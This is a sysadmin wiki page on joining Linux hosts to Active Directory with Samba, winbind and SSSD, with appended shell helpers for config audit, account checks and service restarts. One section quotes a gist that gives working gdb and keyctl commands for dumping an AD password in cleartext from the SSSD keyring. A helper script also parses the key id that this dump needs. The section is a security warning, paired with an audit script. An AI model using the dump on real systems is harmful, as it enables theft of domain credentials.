{{tag>Pb LDAP Auth Windows MDP}}

= AD Active Directory LDAP connection

See:
* [[Notes windows - Active Directory AD - Kerberos - WinRM]]
* [[Notes sssd]]
* realmd (can be configured from Cockpit)

See also:
* Harden AD
* [[Windows - Active Directory - Vérifier si un compte AD est verrouillé]]

== Install notes

Raise the open-file limit for root in /etc/security/limits.conf (the two commented lines are the soft/hard form of the single "-" line, which sets both):
```
#root soft nofile 16384
#root hard nofile 16384
root - nofile 16384
```

Check that the domain controller answers, then join the domain (the original note had "net join ads"; the documented Samba form is "net ads join"; -S picks the DC, -d 3 raises the debug level):
```
wbinfo --ping-dc
net ads join -U useradmin -S cd1-plop.mydomain.local -d 3
```

Show the domain winbind joined:
```
# wbinfo --own-domain
MYDOMAIN
```

=== Security: gdb

Source: https://gist.github.com/gladiatx0r/c52d529ea268f7e74295c2c492cf9774

The SSSD setting in question (leave it at its default of false unless offline logins with cached credentials are really needed; the gist below shows what it costs):
```
[domain/example.com]
krb5_store_password_if_offline = true
```

Quoted from the gist:

For whoever this interests: if you enable krb5_store_password_if_offline in the SSSD configuration, the AD password for accounts is stored in plaintext in the kernel keyring.
To dump the clear-text password you can do:
```
gdb -p <PID>
(gdb) call system("keyctl show > /tmp/output")
```
(The PID argument was lost when the page was extracted; <PID> is a placeholder for the SSSD process whose session keyring holds the key.)

From /tmp/output, locate the key_id for the user you want. Example output:
```
Session Keyring
 204928979 --alswrv      0     0  keyring: _ses
 471547288 --alswrv      0     0   \_ user: user@evilcorp.local
```

Now, again in GDB, do the following:
```
(gdb) call system("keyctl print 471547288 > /tmp/output")   # or whatever key_id from the previous output
```
Enjoy the cleartext password in /tmp/output :)

== Diag

Diagnostic (from ubuntuforums):
* stop smbd, nmbd and winbindd (make sure they are really dead using ps; winbindd still lingered after I stopped the service)
* delete the samba from the PDC (using the Management Console)
* delete the secrets database (/var/lib/samba/secrets.tdb)
* join the domain again
* start the daemons again (smbd, nmbd and winbindd)

Source: https://ubuntuforums.org/showthread.php?t=1857135

On the SSSD side, list the PAM requests recorded in the SSSD logs:
```
sudo sssctl analyze request list --pam
```

== Miscellaneous uses

== Problems

=== AD / LDAP (Active Directory) server connection problem

AD connection problem: restart winbind and samba:
```
/etc/init.d/samba stop
/etc/init.d/winbind stop
/etc/init.d/winbind start
/etc/init.d/samba start
```

== Testing

A specific account (the DOMAIN/compteAD form assumes "winbind separator = /" in smb.conf; the default separator is "\"):
```
getent passwd DOMAIN/compteAD
id compteAD
```

List all accounts and groups:
```
wbinfo -u
wbinfo -g
```
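As an added example (not part of the wiki page or of the quoted gist), here are the two checks a practitioner wants around the "Security: gdb" section: an audit that flags every [domain/...] section of an sssd.conf with krb5_store_password_if_offline = true, and the parser for "keyctl show" output that finds the key id the gist feeds to "keyctl print". The sssd.conf text and the keyctl output are constructed samples; the function names are this example's own.

```shell
#!/usr/bin/env sh
# Added example, not code from the wiki page or the gist.
# 1) audit_sssd_conf  : read an sssd.conf on stdin, print each "domain/..." section
#                       whose krb5_store_password_if_offline is true.
# 2) keyring_find_user_key : read "keyctl show" output on stdin, print the numeric
#                       key id of the "user:" key named after a Kerberos principal.

# Constructed sample config: one domain with the weak setting, one without.
SAMPLE_SSSD_CONF='[sssd]
domains = example.com, corp.example.net
services = nss, pam

[domain/example.com]
id_provider = ad
krb5_store_password_if_offline = true

[domain/corp.example.net]
id_provider = ad
krb5_store_password_if_offline = false
'

# Constructed sample of what "keyctl show" prints (same shape as the gist).
SAMPLE_KEYCTL='Session Keyring
 204928979 --alswrv      0     0  keyring: _ses
 471547288 --alswrv      0     0   \_ user: user@evilcorp.local
'

# Track the current INI section; on the key of interest, print the section
# when the value is "true" and the section is a domain section.
audit_sssd_conf() {
    awk '
        /^[[:space:]]*\[/ {
            sec = $0
            sub(/^[[:space:]]*\[/, "", sec)
            sub(/].*$/, "", sec)
            next
        }
        /^[[:space:]]*krb5_store_password_if_offline[[:space:]]*=/ {
            val = $0
            sub(/^[^=]*=[[:space:]]*/, "", val)
            sub(/[[:space:]]+$/, "", val)
            if (tolower(val) == "true" && sec ~ /^domain\//) print sec
        }
    '
}

# Same audit against the real file (needs permission to read it).
audit_live() { audit_sssd_conf < /etc/sssd/sssd.conf; }

# Usage: keyring_find_user_key "<principal>" < keyctl_show_output
# The key id is the first field of the line whose last field is the principal.
keyring_find_user_key() {
    awk -v p="$1" '
        $0 ~ /user: / && $NF == p { print $1; exit }
    '
}

# Stand-alone demo on the constructed samples.
printf '%s' "$SAMPLE_SSSD_CONF" | audit_sssd_conf
printf '%s' "$SAMPLE_KEYCTL" | keyring_find_user_key user@evilcorp.local
```

On a real host the audit is the check to run after any SSSD change: a non-empty result means a plaintext password can be recovered from the keyring exactly as the gist describes, so the fix is to remove the line or set it to false and restart sssd.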
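As a second added example (again not from the wiki page or the forum post), the "Problems" restart sequence and the "Testing" commands wrapped in helpers: the restart verifies with pgrep that smbd, nmbd and winbindd are really gone before starting again (the forum post's warning about a lingering winbindd), and the account check parses the getent passwd line it gets back. Assumptions: winbind is the NSS backend, the separator is "\" unless WB_SEP is set, the init scripts live under /etc/init.d as on the page, and pgrep is available. The passwd line in the demo is constructed.

```shell
#!/usr/bin/env sh
# Added example, not code from the wiki page.

WB_SEP=${WB_SEP:-'\'}   # "winbind separator" from smb.conf; assumed "\" by default

# Build the NSS name winbind expects, e.g. MYDOMAIN\jdoe.
wb_account() { printf '%s%s%s' "$1" "$WB_SEP" "$2"; }

# Parse one getent passwd line into "uid gid home shell"; non-zero if malformed.
parse_passwd_entry() {
    line="$1"
    IFS=: read -r _name _pw uid gid _gecos home shell <<EOF
$line
EOF
    [ -n "$uid" ] && [ -n "$gid" ] && [ -n "$home" ] || return 1
    printf '%s %s %s %s\n' "$uid" "$gid" "$home" "$shell"
}

# Check one AD account the way the page does (getent, then id), on the live system.
# Usage: check_ad_account MYDOMAIN jdoe
check_ad_account() {
    acct="$(wb_account "$1" "$2")"
    entry="$(getent passwd "$acct")" || { echo "NSS lookup failed for $acct"; return 1; }
    parse_passwd_entry "$entry" || { echo "unparseable passwd entry: $entry"; return 1; }
    id "$acct"
}

# Wait until no process named $1 is left; give up after $2 seconds (default 10).
wait_dead() {
    name="$1"; tries="${2:-10}"
    while pgrep -x "$name" >/dev/null; do
        tries=$((tries - 1))
        [ "$tries" -gt 0 ] || { echo "$name is still running"; return 1; }
        sleep 1
    done
}

# The page's restart sequence, with the "make sure they are really dead" step in between.
restart_winbind_stack() {
    /etc/init.d/samba stop
    /etc/init.d/winbind stop
    wait_dead smbd && wait_dead nmbd && wait_dead winbindd || return 1
    /etc/init.d/winbind start
    /etc/init.d/samba start
    wbinfo --ping-dc
}

# Stand-alone demo on a constructed passwd line (no AD needed).
parse_passwd_entry 'MYDOMAIN\jdoe:*:10001:10000:John Doe:/home/MYDOMAIN/jdoe:/bin/bash'
```

If wait_dead reports that winbindd is still running, kill it explicitly before the start step; starting a second winbindd next to a stuck one is the state the forum post describes.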